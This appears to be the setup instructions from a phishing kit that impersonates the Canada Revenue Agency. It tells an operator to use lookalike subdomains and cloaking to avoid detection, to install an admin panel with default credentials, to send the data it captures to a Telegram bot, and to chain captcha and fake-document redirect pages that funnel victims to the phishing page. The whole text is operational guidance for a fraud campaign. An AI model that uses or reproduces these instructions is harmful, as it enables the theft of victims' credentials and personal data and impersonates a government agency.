Recommendation: for phishing page better use subdomains like https://hg9.canada-vrf.com/en/revenue-agency/services/e-services/ use cloacking do not use domain original keywords Use hosting or server without headers options (HTTP response header): X-Content-Type-Options 'nosniff' ------------------------------------------------ Admin panel: Change php version to 7.4 Create database and user. Add User to BD. Upload BD.sql from "panel" folder via phpmyadmin. In config/config.php, set access to database. Upload admin panel files on server. Set CHMOD 755 to all files Password: superadmin superadmin ----------------------------- ----------------------------- Phishing Page: Set link to admin panel in config/config.js Set tg settings in config/config.js Upload files. i Set CHMOD 777 to'e' and 755 to index.php ----------------------------- ----------------------------- Captcha redirect page: Open config/config.js from txt redactor put your redirect link to phishing page (replace https://phishinghost.com/verif/ ) put your telegram bot settings ----------------------------- ----------------------------- DOC redirect page: Open 1.html or 2.html from txt redactor put your redirect link to phishing page or captcha redirect page (replace https://host.com/#thisistest@gmail.com) ----------------------------- -----------------------------